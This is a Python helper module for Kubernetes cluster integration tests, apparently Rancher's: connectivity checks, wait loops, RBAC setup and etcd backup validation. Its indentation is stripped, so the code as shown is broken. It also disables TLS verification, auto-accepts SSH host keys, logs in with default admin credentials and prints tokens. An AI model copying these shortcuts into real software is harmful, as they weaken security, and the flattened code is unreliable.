# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
r = requests.post(auth_url, json={
'username': 'admin',
'password': 'admin',
'responseType': 'json',
}, verify=False)
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
